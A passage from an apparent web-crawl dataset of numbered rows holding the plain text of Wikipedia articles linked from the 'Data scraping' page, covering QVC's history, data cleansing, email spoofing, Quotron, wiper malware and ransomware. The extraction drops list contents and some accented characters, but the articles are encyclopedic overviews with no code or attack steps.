stake in QVC, or just under 3 percent of the company, in December 1992 and Diller succeeded Segel as chairman and chief executive on January 18, 1993. 22 Diller, known for building Fox as a fourth national television network in just five years, replaced QVC's second channel, The Fashion Channel, with Q2. 23 Debuting in spring 1994, Q2 was aimed at younger, more economic shoppers, and broadcast from New York City. The spin-off network was shelved in 1996, costing QVC $55 million. 24 QVC, under Diller, first placed a hostile $9.6 billion bid for Paramount in September 1993, when talks for a friendly merger between Paramount and Viacom, worth $7.2 billion at the time, were already under way. 25 QVC's more attractive bid was forced on Paramount in the February 4, 1994 decision of Paramount Communications, Inc. v. QVC Network, Inc. by the Delaware Supreme Court. Following Viacom's merger with Blockbuster that gave Viacom the financial lead, Diller proposed that QVC financial backer BellSouth could buy QVC shares after the merger to boost the value of QVC's stock to Paramount shareholders. 26 Diller dropped the proposal when reminded of its legal challenges and on February 14, 1994, QVC lost its bid for Paramount to a $9.85 billion bid from Viacom. 27 28 Diller's reported five-word response to the end of what The Los Angeles Times called "the biggest takeover war of the 1990s" was: "They won. We lost. Next. 29 Diller changed the name of QVC Network to QVC, Inc. in 1994, while creating a holding company to allow the firm to diversify and build assets and divisions separately. Among the changes were the creation of two new divisions, Q Direct, to produce infomercials and 60 and 120 second direct response TV commercials, and QVC Interactive, an online-shopping service. 30 QVC launched their internet shopping site, iQVC, on September 15, 1996. 31 QVC's shopping channel based in Mexico, airing in non-primetime programming hours on Canal 4, launched November 1, 1993 in a partnership with Televisa, and known domestically as CVC (a Spanish translation of the network's full name). 32 The operation closed on August 4, 1995, after the devaluation of the Mexican peso during a monetary transition, and a general national loathing of long-form home shopping and paid programming content. 33 On September 29, 1994, QVC Vice President Douglas Briggs unveiled the QVC Local, a customized, $1.7 million state-of-the-art television studio in a bus, in Washington, D.C. 34 In January 1995, QVC kicked off the "Quest for America's Best: 50 in 50 Tour, a 50 week nationwide product search to promote local and regional products with live broadcasts from every State. The QVC Local traveled 88,796 miles of American road during the 50 in 50 Tour in 1995. 35 Comcast and TCI spin-off company Liberty Media completed their acquisition of the company on February 2, 1995, and Diller resigned. Douglas S. Briggs was announced as QVC Inc. CEO on March 6, 1995, after overseeing the daily business of the company as president of QVC electronic retailing and executive vice president of QVC Inc. since February 1994. 36 Briggs was tasked with boosting Diller's many start-up ventures, including QVC UK and Q2. 37 On September 24, 1997, at 7pm ET, QVC signed off their live broadcast from their previous studio and celebrated the opening of their new broadcast center and corporate offices, Studio Park, a nearly 17 acre property with more than 58,000 square feet of filming studios in West Chester, Pennsylvania. 38 39 QVC tested a retail concept in 2000 at The Mall of America in Bloomington, Minnesota with a limited-term lease on a 500 square-foot store. 40 The next year, QVC signed a ten-year lease on a 2,500 square-foot store with broadcasting capabilities and opened QVC The Mall on August 8, 2001. 41 The Mall of America store remained the only location for this format and the store closed at the conclusion of the ten-year lease on March 22, 2011. 42 In 1998, two former hosts filed a class-action lawsuit against QVC, claiming that they were discriminated against by the shopping channel based on their race. The lawsuit went on to state that QVC refused to allow non-white hosts any permanent daytime primetime spots, which relegated them to the overnight hours, otherwise known as the "graveyard shift. Because of this, the non-white hosts were paid considerably less than the white hosts. 43 44 On July 3, 2003, Comcast sold its majority share to Liberty Media, which purchased the remaining 56.5% of QVC it didn't already own for $7.9 billion. Comcast, for which QVC was a financial asset, not a strategic one, continued to carry QVC for its 21 million cable subscribers. 45 On Wednesday, March 24, 2004, the FTC sued QVC over violating a June 2000 order barring the company from making misleading claims about dietary supplements. 46 A March 2009 settlement with the FTC charged QVC with paying $6 million for consumer redress and a $1.5 million civil penalty and for QVC to discontinue the dietary supplements products. 47 48 In 2006, the U.S. District Court in Philadelphia settled a dispute between QVC and HSN over the use of the phrase "Christmas in July, QVC maintaining their use of it since 1987, and HSN claiming copyright on it in 2000. 49 CEO Douglas Briggs announced his retirement in April 2005 and on November 1, 2005, Michael A. George, who previously served as chief marketing officer and general manager of the U.S. consumer business at Dell Inc, was named successor. George was named QVC CEO on April 15, 2006. 50 On September 23, 2007, QVC U.S. rebranded itself, changing its logo on-air and online. The rebranding was accompanied by an advertising campaign with the tagline "iQdoU? ("I shop QVC, do you? ) that had preceded the rebrand with billboards in major U.S. cities. The iQdoU? campaign also included a "teaser" website. 51 52 On September 30, 2010, at 11 p.m., QVC began broadcasting in Italy, both on satellite and through digital terrestrial television. In 2012, QVC partnered with China National Radio to take over operations of its home shopping network and associated internet e-commerce site, CNR Mall. In 2014 the joint venture reached 89 million households. 53 In 2013, QVC partnered with Ion Media Networks to bring its programming to broadcast television, through Ion Television. 54 QVC began to be carried as the fifth digital subchannel on most Ion Television owned-and-operated stations beginning on August 5, 2013; due to technical limitations caused by the number of subchannels Ion requires its stations to carry, QVC is carried in a squeezed full-screen 4:3 format and is transmitted in standard definition, and the arrangement has since spread to other broadcasters with improvements in multiplexing a number of subchannels. The arrangement also features different on-screen toll-free lines for each station group to allow them to participate in revenue sharing in exchange for the channel space. 55 The broadcast service is branded as "QVC Over the Air", with an accompanying on-screen bug appearing on the lower right corner of the screen during the network's programming. After integrating their shopping experience with Facebook in 2008 and with Instagram in 2012, QVC launched toGather, a social shopping platform resembling Pinterest in July 2013. The site allowed members to set up a personalized newsfeed to view shopping recommendations from people and brands they chose to follow. QVC shut down the site in January 2015. 56 57 On October 21, 2014, QVC returned to the NASDAQ, with trading names QVCA and QVCB. 58 In August 2015, QVC acquired the online retailer Zulily for $2.4 billion. 59 60 On July 6, 2017, QVC's parent company, Liberty Interactive, announced its intention to purchase the remaining 62% of stock it did not already own of HSN, the rival home shopping channel. The all-stock deal is valued at $2.1 billion ($40.36 a share). 61 62 63 In 2018, Liberty Interactive rebranded itself as Qurate Retail Group, trading under the new NASDAQ tickers QRTEA and QRTEB, with Mike George remaining as president and CEO. 64 In 2018, Qurate named Leslie Ferraro as President of their QVC and HSN units. Ferraro concluded her 17 year run at The Walt Disney Company where she most recently served as co-chair of Disney Consumer Products and Interactive Media and president of Disney Consumer Products and reported to work at Qurate on September 16. 65 On February 6, 2019, QVC again rebranded itself, the new logo with a square shape intended to resemble a computer or a phone screen emphasizing its digital and mobile platforms. The reimagined 'Q' in a sleek, mobile-friendly format, has a lever that is supposed to symbolize an open door, said Susan Ripke, QVC's vice president of brand strategy. 66 On Monday, October 7, 2019, QVC ceased its 24 7 live broadcasting model in favor of airing nineteen hours of live and five hours of repeated programming daily. 67 As early as March 16, 2020, QVC saw changes to their operations due to the global COVID 19 pandemic, with on-air product representatives appearing via Skype from around the world, calling in to live broadcasts with program hosts and models practicing social distancing. QVC remained live on-air 20 hours a day, with QVC2 temporarily cutting back to one live hour per day. Employees not essential to the West Chester, Pennsylvania live broadcast shifted to remote work, while all fulfillment centers in Pennsylvania, Virginia, California, and North and South Carolina remained operational with the introduction of health and safety measures and enhanced sanitation practices. 68 Additionally, despite posted revenue gains, Qurate laid off 450 employees in July 2020 "to simplify and streamline its operating structure. 69 Approximately 75% of QVC's 1.2 million-square-foot Rocky Mount, North Carolina distribution center was damaged in a fire on December 18, 2021, fire, which resulted the death of an employee, along with the furloughing of the facility's 2,000 person workforce, as QVC chose not to restore operations at the site and sold it off in the spring of 2023. 70 71 On August 22, 2013, QVC launched a timeshift channel called QVC Plus (the first such channel operated by a home shopping network), made available initially on cable provider Bright House Networks and satellite provider DirecTV, which broadcasts the channel's programming on a three-hour tape delay. 72 On April 1, 2017, QVC Plus was rebranded as QVC2 as a destination for more live programming, broadcasting live 12 hours a day, Monday through Friday from noon to midnight ET, and Saturdays and Sundays from 10am 10pm ET. 73 After four months of reduced programming on QVC2 due to the global coronavirus pandemic, QVC2 ceased live programming on July 14, 2020, focusing thereafter only on repeated QVC programming. 74 QVC2 restored live programming with 2 hours live programming daily on December 9, 2020, which increased to 13 hours live daily on July 1, 2021. On April 1, 2019, Beauty iQ's broadcast channel was rebranded as QVC3, airing rebroadcasts of previously recorded QVC and QVC2 programming 24 hours a day. On June 1, 2022, it took over the cable carriage formerly held by ShopHQ's secondary channel, ShopHQ Health. On October 25, 2016, QVC announced the creation of Beauty iQ, a female-oriented television channel based entirely on beauty products. The network was launched on both DirecTV and Dish Network on October 31, 2016. 75 Beauty iQ aired live programming Monday through Friday, 8pm- Midnight ET. Beauty iQ ceased live programming on March 13, 2019. Beginning April 23, 2019, QVC introduced Beauty iQ as their first digital-only channel, in order to better target its younger audience. 76 On March 1, 2021, BeautyiQ converted to QVC NOW, a mix of various repeated QVC programming. All of QVC's operations (U.S., UK, Germany, Japan, Italy, and China) run 24 hours a day, although live programming hours vary between each region. QVC has its headquarters in West Chester, Pennsylvania by U.S. Route 202. 77 78 The $100 million QVC Studio Park complex, located on an 80 acres (32 ha) plot of land, opened in 1997. 79 QVC's U.S. operations are based in the Studio Park complex, which houses its corporate headquarters, studio and broadcasting facilities. Studio Park is the former corporate offices of the computer company Commodore. QVC's distribution centers are located in Lancaster, Pennsylvania, Bethlehem, Pennsylvania, Suffolk, Virginia, Florence, South Carolina, and Ontario, California. Its 2013 sales were worth $5.84 billion. 80 Call center facilities were located in San Antonio, Texas and Chesapeake, Virginia, though both closed after call center employees permanently transitioned to remote work during the COVID 19 pandemic in 2020. A call center in Port St. Lucie, Florida was also in operation until 2016. 81 QVC U.S. also operates two outlet stores in Lancaster, Pennsylvania and Frazer, Pennsylvania. 82 QVC broadcasts live in the United States 20 7. The four hours from 3am until 7am Eastern time, loop the "Today's Special Value" feature for Pacific Time Zone viewers, and previously aired programming. QVC broadcasts 364 days a year to more than 100 million households, and ranks as the number two television network in terms of revenue ( 1 in home shopping networks), with sales in 2015 giving a net revenue of $8.7 billion. The only day on which QVC does not broadcast its usual format is Christmas, when the station runs a taped telecast of the West Chester Christmas Parade and other pre-recorded programming. 83 54 Every year the "QVC Presents 'FFANY Shoes on Sale' event is broadcast in which donated designer shoes are sold at half the suggested retail price and 80% of the proceeds go to breast cancer research and education. It is organized with the Fashion Footwear Association of New York, which runs a coinciding Shoes on Sale initiative along with an awards gala. 84 85 86 87 QVC UK was launched on October 1, 1993. QVC UK's headquarters and broadcasting facilities are in Chiswick Park, West London. Call centre and distribution warehouse are situated in Knowsley in Merseyside. QVC UK also runs an outlet store in Warrington; another was in Shrewsbury, but this closed in June 2020. QVC UK also operates three channels made up mostly of rerun segments from the live channel, QVC Beauty, QVC Extra and QVC Style. The company's UK sales in 2013 were worth $660 million, now reaching to 27 million households in Britain and Ireland. 53 80 QVC UK's main channel broadcasts live 364 days a year from 09:00 to 01:00. For the 8 'non-live' hours a day and on one day a year, Christmas Day, the main channel shows rerun segments from the live channel. QVC Germany, incorporated in D sseldorf, runs call centre operations from sites in Bochum and Kassel, whilst distribution is handled from a dedicated warehouse in H ckelhoven. The company's 2013 sales were worth $970 million. 80 QVC Germany first broadcast December 1, 1996 and reaches 41 million households in Germany and Austria. 53 QVC Germany broadcasts live 17 hours a day, 363.5 days a year (the channel goes off-air on Christmas Eve (with no programming after noon) and Christmas Day). QVC has two additional channels in Germany, QVC 2 and QVC Style. QVC Japan, a joint venture with Mitsui Co., is based in Makuhari, where its broadcast studio, corporate headquarters, and call center facility are located. Distribution facilities are in Sakura City. The company's 2013 sales were worth $1.02 billion. 80 QVC Japan first broadcast on April 1, 2001, and reaches 27 million households. The channel once broadcast live programming 24 hours a day and now airs 19 live programming hours daily. 53 QVC Italy first broadcast on October 1, 2010. 88 QVC Italy's headquarters and broadcasting facilities are located at Brugherio, near Milan and the distribution center is located in Castel San Giovanni. 53 The company's 2013 sales were worth $130 million. 80 QVC Italy broadcasts live 17 hours a day (although the channel runs 24 hours a day), 364 days a year to 25 million households. The primary distribution platforms for QVC Italy are digital terrestrial television and satellite. On August 1, 2015, QVC reached its seventh international market with France. 53 89 Before the launch, the company said it expected to create about 200 jobs in its first two years in the country. QVC France broadcast from their studio and administration facility in Seine-Saint-Denis live on weekdays from 15:00 to 23:00 and weekends from 11:00 to 23:00, online, on mobile devices and on major satellite TV, cable TV and internet TV. 90 The channel's corporate website said QVC stood for: Qualit , Valeur, Confiance, replacing convenience with (the French for) trust. 80 Qurate Retail Group ceased operations of QVC France on March 13, 2019, stating that "QVC France had underperformed against financial and operational expectations, in large part due to unique in-market structural challenges and market dynamics that evolved in the years following the launch of the operation. 91 QVC CNR (China) is based in Beijing and operates both a television broadcast and associated e-commerce website cnrmall.com. The China operation is a 51 49 joint venture between state-owned China National Radio and QVC, based on the pre-existing CNR channel reaching 35 million households, with plans to grow to 195 million households that have digital cable. 92 Chinese law prohibits private control of television stations, so this is the maximum position QVC can hold in its Chinese operations. QVC CNR broadcasts live 17 hours a day. 53 The company's 2013 sales were worth $110 million. 80 Since August 11, 1987, QVC has branded their daily featured product as Today's Special Value. Originally, Today's Special Value (TSV) was a product specially priced for one day only, but since 2017, contrary to its name, it is offered for a variable amount of time, for up to two weeks. 93 |
59 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_cleansing | Data cleansing or data cleaning is the process of detecting and correcting (or removing) corrupt or inaccurate records from a record set, table, or database and refers to identifying incomplete, incorrect, inaccurate or irrelevant parts of the data and then replacing, modifying, or deleting the dirty or coarse data. 1 Data cleansing may be performed interactively with data wrangling tools, or as batch processing through scripting or a data quality firewall. After cleansing, a data set should be consistent with other similar data sets in the system. The inconsistencies detected or removed may have been originally caused by user entry errors, by corruption in transmission or storage, or by different data dictionary definitions of similar entities in different stores. Data cleaning differs from data validation in that validation almost invariably means data is rejected from the system at entry and is performed at the time of entry, rather than on batches of data. The actual process of data cleansing may involve removing typographical errors or validating and correcting values against a known list of entities. The validation may be strict (such as rejecting any address that does not have a valid postal code), or with fuzzy or approximate string matching (such as correcting records that partially match existing, known records). Some data cleansing solutions will clean data by cross-checking with a validated data set. A common data cleansing practice is data enhancement, where data is made more complete by adding related information. For example, appending addresses with any phone numbers related to that address. Data cleansing may also involve harmonization (or normalization) of data, which is the process of bringing together data of "varying file formats, naming conventions, and columns", 2 and transforming it into one cohesive data set; a simple example is the expansion of abbreviations ("st, rd, etc. to "street, road, etcetera"). Administratively incorrect, inconsistent data can lead to false conclusions and misdirect investments on both public and private scales. For instance, the government may want to analyze population census figures to decide which regions require further spending and investment on infrastructure and services. In this case, it will be important to have access to reliable data to avoid erroneous fiscal decisions. In the business world, incorrect data can be costly. Many companies use customer information databases that record data like contact information, addresses, and preferences. For instance, if the addresses are inconsistent, the company will suffer the cost of resending mail or even losing customers. High-quality data needs to pass a set of quality criteria. Those include: The term integrity encompasses accuracy, consistency and some aspects of validation (see also data integrity) but is rarely used by itself in data-cleansing contexts because it is insufficiently specific. (For example, "referential integrity" is a term used to refer to the enforcement of foreign-key constraints above.) Good quality source data has to do with “Data Quality Culture” and must be initiated at the top of the organization. It is not just a matter of implementing strong validation checks on input screens, because almost no matter how strong these checks are, they can often still be circumvented by the users. There is a nine-step guide for organizations that wish to improve data quality: 3 4 Others include: The essential job of this system is to find a suitable balance between fixing dirty data and maintaining the data as close as possible to the original data from the source production system. This is a challenge for the Extract, transform, load architect. The system should offer an architecture that can cleanse data, record quality events and measure control quality of data in the data warehouse. A good start is to perform a thorough data profiling analysis that will help define to the required complexity of the data cleansing system and also give an idea of the current data quality in the source system(s). Part of the data cleansing system is a set of diagnostic filters known as quality screens. They each implement a test in the data flow that, if it fails, records an error in the Error Event Schema. Quality screens are divided into three categories: When a quality screen records an error, it can either stop the dataflow process, send the faulty data somewhere else than the target system or tag the data. The latter option is considered the best solution because the first option requires, that someone has to manually deal with the issue each time it occurs and the second implies that data are missing from the target system (integrity) and it is often unclear what should happen to these data. Most data cleansing tools have limitations in usability: The error event schema holds records of all error events thrown by the quality screens. It consists of an error event Fact table with foreign keys to three dimension tables that represent date (when), batch job (where) and screen (who produced error). It also holds information about exactly when the error occurred and the severity of the error. Also, there is an error event detail fact table with a foreign key to the main table that contains detailed information about in which table, record and field the error occurred and the error condition. |
60 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Email_spoofing | Email spoofing is the creation of email messages with a forged sender address. 1 The term applies to email purporting to be from an address which is not actually the sender's; mail sent in reply to that address may bounce or be delivered to an unrelated party whose identity has been faked. Disposable email address or "masked" email is a different topic, providing a masked email address that is not the user's normal address, which is not disclosed (for example, so that it cannot be harvested), but forwards mail sent to it to the user's real address. 2 The original transmission protocols used for email do not have built-in authentication methods: this deficiency allows spam and phishing emails to use spoofing in order to mislead the recipient. More recent countermeasures have made such spoofing from internet sources more difficult but they have not eliminated it completely; few internal networks have defences against a spoof email from a colleague's compromised computer on that network. Individuals and businesses deceived by spoof emails may suffer significant financial losses; in particular, spoofed emails are often used to infect computers with ransomware. When a Simple Mail Transfer Protocol (SMTP) email is sent, the initial connection provides two pieces of address information: Together, these are sometimes referred to as the "envelope" addressing an analogy to a traditional paper envelope. 3 Unless the receiving mail server signals that it has problems with either of these items, the sending system sends the "DATA" command, and typically sends several header items, including: The result is that the email recipient sees the email as having come from the address in the From: header. They may sometimes be able to find the MAIL FROM address, and if they reply to the email, it will go to either the address presented in the From: or Reply-to: header, but none of these addresses are typically reliable, 4 so automated bounce messages may generate backscatter. Although email spoofing is effective in forging the email address, the IP address of the computer sending the mail can generally be identified from the "Received: lines in the email header. 5 In malicious cases, however, this is likely to be the computer of an innocent third party infected by malware that is sending the email without the owner's knowledge. Phishing and business email compromise scams generally involve an element of email spoofing. Email spoofing has been responsible for public incidents with serious business and financial consequences. This was the case in an October 2013 email to a news agency which was spoofed to look as if it was from the Swedish company Fingerprint Cards. The email stated that Samsung offered to purchase the company. The news spread and the stock exchange rate surged by 50%. 6 Malware such as Klez and Sober among many more modern examples often search for email addresses within the computer they have infected, and they use those addresses both as targets for email, and also to create credible forged From fields in the emails that they send. citation needed This is to ensure that the emails are more likely to be opened. For example: In this case, even if Bob's system detects the incoming mail as containing malware, he sees the source as being Charlie, even though it really came from Alice's computer. Meanwhile, Alice may remain unaware that her computer has been infected, and Charlie does not know anything about it at all, unless he receives an error message from Bob. Traditionally, mail servers could accept a mail item, then later send a Non-Delivery Report or "bounce" message if it could not be delivered or had been quarantined for any reason. These would be sent to the "MAIL FROM: a.k.a. "Return Path" address. With the massive rise in forged addresses, best practice is now to not generate NDRs for detected spam, viruses etc. 7 but to reject the email during the SMTP transaction. When mail administrators fail to take this approach, their systems are guilty of sending "backscatter" emails to innocent parties in itself a form of spam or being used to perform "Joe job" attacks. The SSL TLS system used to encrypt server-to-server email traffic can also be used to enforce authentication, but in practice it is seldom used, 8 and a range of other potential solutions have also failed to gain traction. A number of defensive systems have come into wide use, including: To effectively stop forged email being delivered, the sending domains, their mail servers, and the receiving system all need to be configured correctly for these higher standards of authentication. Although their use is increasing, estimates vary widely as to what percentage of emails have no form of domain authentication: from 8.6% 10 to "almost half". 11 12 13 For this reason, receiving mail systems typically have a range of settings to configure how they treat poorly-configured domains or email. 14 15 While there has been research into improving email security, little emphasis has been placed on informing users whose email addresses have been used for spoofing. Currently, only the email recipient can identify a fake email, and users whose addresses are spoofed remain unaware unless the recipient manually scrutinizes the message. citation needed Business email compromise attacks are a class of cyber crime which use email fraud to attack organizations. Examples include invoice scams and spear-phishing attacks which are designed to gather data for other criminal activities. A business deceived by an email spoof can suffer additional financial, business continuity and reputational damage. Fake emails can also be used to spread malware. Typically, an attack targets specific employee roles within an organization by sending spoof emails which fraudulently represent a senior colleague, trusted customer, or supplier. 16 (This type of attack is known as spear phishing). The email will issue instructions, such as approving payments or releasing client data. The emails often use social engineering to trick the victim into making money transfers to the bank account of the fraudster. 17 The United States' Federal Bureau of Investigation recorded $26 billion of US and international losses associated with BEC attacks between June 2016 and July 2019. 18 More recent figures estimate losses of over $50 billion from 2013 to 2022. 19 |
61 | https://en.wikipedia.org/wiki/Web_scraping | https://id.wikipedia.org/wiki/Menggali_web | Menggali web' merupakan kegiatan yang dilakukan untuk mengambil data tertentu secara semi-terstruktur dari sebuah halaman situs web. Halaman tersebut umumnya dibangun menggunakan bahasa markup seperti HTML atau XHTML, proses akan menganalisis dokumen sebelum memulai mengambil data. Biasanya teknik scraping diimplementasikan pada sebuah bot agar bisa membuat proses yang harusnya dilakukan secara manual menjadi otomatis. Ketika kita menjumpai sebuah situs yang membatasi kuota API (application programming interface) atau bahkan tidak menyediakan sama sekali, maka perayapan web akan sangat dibutuhkan sebagai langkah pengambilan data. |
62 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=history | For any version listed below, click on its date to view it. For more help, see Help:Page history and Help:Edit summary. (cur) difference from current version, (prev) difference from preceding version, m minor edit, section edit, automatic edit summary |
63 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Quotron | Quotron was a Los Angeles based company that in 1960 became the first financial data technology company to deliver stock market quotes to an electronic screen rather than on a printed ticker tape. The Quotron offered brokers and money managers up-to-the-minute prices and other information about securities. 1 The Quotron was developed by Scantlin Electronics, owned by entrepreneur John Scantlin. Scantlin had earlier developed a quotation device that used magnetic tape instead of ticker tape. 2 Quotron's first major competitor was Telerate, which was founded by Neil Hirsch in 1969 and later bought by Dow Jones in 1990. 3 Citicorp bought Quotron in 1986. At the time Quotron was renting 100,000 terminals which equated to 60 percent of the 1986 market for financial data. 4 Following the Citicorp acquisition, Quotron's largest client, brokerage house Merrill Lynch, decided not to renew their contract with Quotron. Merrill Lynch instead invested in a competing startup named Bloomberg. Most computer screens in the 1980s were able to display text in a single color. Quotron screens had green text on a black background. The Quotron was the screen used by Charlie Sheen's Bud Fox and Michael Douglas's Gordon Gekko characters in the 1987 movie Wall Street. 5 When the Bloomberg professional terminal launched for bond traders it had amber text on a black background. Quotron did not keep pace with developments in technology and the company was slow to move from a dedicated terminal to personal computers, as the proprietary Bloomberg Terminal overtook its market share. By 1994 Quotron had only 35,000 terminals compared with 80,000 for Automatic Data Processing and 25,000 for ILX, according to Waters Information Services. Citicorp lost money on Quotron every year and, in 1994, paid Reuters Holdings P.L.C. more than $100 million to purchase the ailing Quotron. Quotron then became Reuters' trading floor terminal, until it was superseded by the Reuters 3000 Xtra and Triarch platform. Thomson Reuters and Bloomberg lead the trading floor terminal space today with 70% of the market. 1 In early 2023, Quotron has been revitalized by a group of tech entrepreneurs that have started developing modern stock tickers for individuals traders. 6 |
64 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wiper_(malware) | In computer security, a wiper is a class of malware intended to erase (wipe, hence the name) the hard drive or other static memory of the computer it infects, maliciously deleting data and programs. A piece of malware referred to as "Wiper" was allegedly used in attacks against Iranian oil companies. In 2012, the International Telecommunication Union supplied Kaspersky Lab with hard drives allegedly damaged by Wiper for analysis. While a sample of the alleged malware could not be found, Kaspersky discovered traces of a separate piece of malware known as Flame. 1 2 3 The Shamoon malware contained a disk wiping mechanism; it was employed in 2012 and 2016 malware attacks targeting Saudi energy companies, and utilized a commercial direct drive access driver known as Rawdisk. The original variant overwrote files with portions of an image of a burning U.S. flag. The 2016 variant was nearly identical, except using an image of the body of Alan Kurdi instead. 4 5 A wiping component was used as part of the malware employed by the Lazarus Group—a cybercrime group with alleged ties to North Korea, during the 2013 South Korea cyberattack, and the 2014 Sony Pictures hack. 6 7 8 The Sony hack also utilized RawDisk. 4 In 2017, computers in several countries—most prominently Ukraine, were infected by NotPetya, which is a variant of the Petya ransomware that was a wiper in functional sense. The malware infects the master boot record with a payload that encrypts the internal file table of the NTFS file system. Although it still demanded a ransom, it was found that the code had been significantly modified so that the payload could not actually revert its changes, even if the ransom were successfully paid. 9 10 Several variants of wiper malware were discovered during the 2022 Ukraine cyberattacks on computer systems associated with Ukraine. Named CaddyWiper, HermeticWiper, IsaacWiper, and FoxBlade by researchers, the programs showed little relation to each other, prompting speculation that they were created by different state-sponsored actors in Russia especially for this occasion. 11 Reactive redundancy is a possible solution for data destruction protection. Researchers are able to create systems capable of analyzing write buffers before they reach a storage medium, determine if the write is destructive, and preserve the data under destruction. 12 |
65 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Ransomware | Ransomware is a type of cryptovirological malware that permanently blocks access to the victim's personal data unless a "ransom" is paid. While some simple ransomware may lock the system without damaging any files, more advanced malware uses a technique called cryptoviral extortion. It encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. 1 2 3 4 5 In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem, and difficult-to-trace digital currencies such as paysafecard or Bitcoin and other cryptocurrencies are used for the ransoms, making tracing and prosecuting the perpetrators difficult. Ransomware attacks are typically carried out using a Trojan disguised as a legitimate file that the user is tricked into downloading or opening when it arrives as an email attachment. However, one high-profile example, the WannaCry worm, traveled automatically between computers without user interaction. 6 Starting as early as 1989 with the first documented ransomware known as the AIDS trojan, the use of ransomware scams has grown internationally. 7 8 9 There were 181.5 million ransomware attacks in the first six months of 2018. This record marks a 229% increase over this same time frame in 2017. 10 In June 2014, vendor McAfee released data showing that it had collected more than double the number of ransomware samples that quarter than it had in the same quarter the previous year. 11 CryptoLocker was particularly successful, procuring an estimated US$3 million before it was taken down by authorities, 12 and CryptoWall was estimated by the US Federal Bureau of Investigation (FBI) to have accrued over US$18 million by June 2015. 13 In 2020, the IC3 received 2,474 complaints identified as ransomware with adjusted losses of over $29.1 million. The losses could be more than that, according to the FBI. 14 Globally, according to Statistica, there were about 623 million ransomware attacks in 2021, and 493 million in 2022. 15 The concept of file-encrypting ransomware was invented and implemented by Young and Yung at Columbia University and was presented at the 1996 IEEE Security Privacy conference. It is called cryptoviral extortion and it was inspired by the fictional facehugger in the movie Alien. 16 Cryptoviral extortion is the following three-round protocol carried out between the attacker and the victim. 1 The symmetric key is randomly generated and will not assist other victims. At no point is the attacker's private key exposed to victims and the victim need only send a very small ciphertext (the encrypted symmetric-cipher key) to the attacker. Ransomware attacks are typically carried out using a Trojan, entering a system through, for example, a malicious attachment, embedded link in a phishing email, or a vulnerability in a network service. The program then runs a payload, which locks the system in some fashion, or claims to lock the system but does not (e.g., a scareware program). Payloads may display a fake warning purportedly by an entity such as a law enforcement agency, falsely claiming that the system has been used for illegal activities, contains content such as pornography and "pirated" media. 17 18 19 Some payloads consist simply of an application designed to lock or restrict the system until payment is made, typically by setting the Windows Shell to itself, 20 or even modifying the master boot record and or partition table to prevent the operating system from booting until it is repaired. 21 The most sophisticated payloads encrypt files, with many using strong encryption to encrypt the victim's files in such a way that only the malware author has the needed decryption key. 1 22 23 Payment is virtually always the goal, and the victim is coerced into paying for the ransomware to be removed either by supplying a program that can decrypt the files, or by sending an unlock code that undoes the payload's changes. While the attacker may simply take the money without returning the victim's files, it is in the attacker's best interest to perform the decryption as agreed, since victims will stop sending payments if it becomes known that they serve no purpose. A key element in making ransomware work for the attacker is a convenient payment system that is hard to trace. A range of such payment methods have been used, including wire transfers, premium-rate text messages, 24 pre-paid voucher services such as paysafecard, 7 25 26 and the Bitcoin cryptocurrency. 27 28 29 In May 2020, vendor Sophos reported that the global average cost to remediate a ransomware attack (considering downtime, people time, device cost, network cost, lost opportunity and ransom paid) was $761,106. Ninety-five percent of organizations that paid the ransom had their data restored. 30 The first known malware extortion attack, the "AIDS Trojan" written by Joseph Popp in 1989, had a design failure so severe it was not necessary to pay the extortionist at all. Its payload hid the files on the hard drive and encrypted only their names, and displayed a message claiming that the user's license to use a certain piece of software had expired. The user was asked to pay US$189 to "PC Cyborg Corporation" in order to obtain a repair tool even though the decryption key could be extracted from the code of the Trojan. The Trojan was also known as "PC Cyborg". Popp was declared mentally unfit to stand trial for his actions, but he promised to donate the profits from the malware to fund AIDS research. 31 The idea of abusing anonymous cash systems to safely collect ransom from human kidnapping was introduced in 1992 by Sebastiaan von Solms and David Naccache. 32 This electronic money collection method was also proposed for cryptoviral extortion attacks. 1 In the von Solms-Naccache scenario a newspaper publication was used (since bitcoin ledgers did not exist at the time the paper was written). The notion of using public key cryptography for data kidnapping attacks was introduced in 1996 by Adam L. Young and Moti Yung. Young and Yung critiqued the failed AIDS Information Trojan that relied on symmetric cryptography alone, the fatal flaw being that the decryption key could be extracted from the Trojan, and implemented an experimental proof-of-concept cryptovirus on a Macintosh SE 30 that used RSA and the Tiny Encryption Algorithm (TEA) to hybrid encrypt the victim's data. Since public key cryptography is used, the virus only contains the encryption key. The attacker keeps the corresponding private decryption key private. Young and Yung's original experimental cryptovirus had the victim send the asymmetric ciphertext to the attacker who deciphers it and returns the symmetric decryption key it contains to the victim for a fee. Long before electronic money existed Young and Yung proposed that electronic money could be extorted through encryption as well, stating that "the virus writer can effectively hold all of the money ransom until half of it is given to him. Even if the e-money was previously encrypted by the user, it is of no use to the user if it gets encrypted by a cryptovirus". 1 They referred to these attacks as being "cryptoviral extortion", an overt attack that is part of a larger class of attacks in a field called cryptovirology, which encompasses both overt and covert attacks. 1 The cryptoviral extortion protocol was inspired by the parasitic relationship between H. R. Giger's facehugger and its host in the movie Alien. 1 16 Examples of extortionate ransomware became prominent in May 2005. 33 By mid 2006, Trojans such as Gpcode, TROJ.RANSOM.A, Archiveus, Krotten, Cryzip, and MayArchive began utilizing more sophisticated RSA encryption schemes, with ever-increasing key-sizes. Gpcode.AG, which was detected in June 2006, was encrypted with a 660 bit RSA public key. 34 In June 2008, a variant known as Gpcode.AK was detected. Using a 1024 bit RSA key, it was believed large enough to be computationally infeasible to break without a concerted distributed effort. 35 36 37 38 Encrypting ransomware returned to prominence in late 2013 with the propagation of CryptoLocker—using the Bitcoin digital currency platform to collect ransom money. In December 2013, ZDNet estimated based on Bitcoin transaction information that between 15 October and 18 December, the operators of CryptoLocker had procured about US$27 million from infected users. 39 The CryptoLocker technique was widely copied in the months following, including CryptoLocker 2.0 (thought not to be related to CryptoLocker), CryptoDefense (which initially contained a major design flaw that stored the private key on the infected system in a user-retrievable location, due to 